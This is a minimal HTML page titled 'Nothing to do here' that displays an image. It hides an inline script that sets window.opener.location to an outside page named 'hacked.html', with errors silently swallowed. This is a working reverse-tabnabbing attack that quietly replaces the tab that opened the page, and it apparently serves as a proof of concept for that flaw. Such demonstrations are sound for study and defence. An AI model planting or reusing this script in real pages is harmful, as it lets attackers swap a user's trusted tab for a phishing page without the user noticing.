<html>

<title>Nothing to do here</title>

<head>
</head>

<body>

	<style type="text/css"> 
		#image {
			position:absolute;
			top: 50%;
			left: 40%;
			width:60em;
			height:30em;
			margin-top: -12.5em; /*set to a negative number 1/2 of your height*/
			margin-left: -20em; /*set to a negative number 1/2 of your width*/
			border: 1px solid #ccc;
			background-color: #E0F2F1;
		}

		.center {
			top: 50%;
			left: 50%;
		}

		body {
			background-color: #D3D3D3;
		}
	</style>

	<script>
		try 
		{
		    window.opener.location = 'https://igoranze.github.io/hacked.html';
		}
		catch (e) { }
	</script>

	<img src="/ntdh.jpg" id="image" /> 

	</body>
</html>
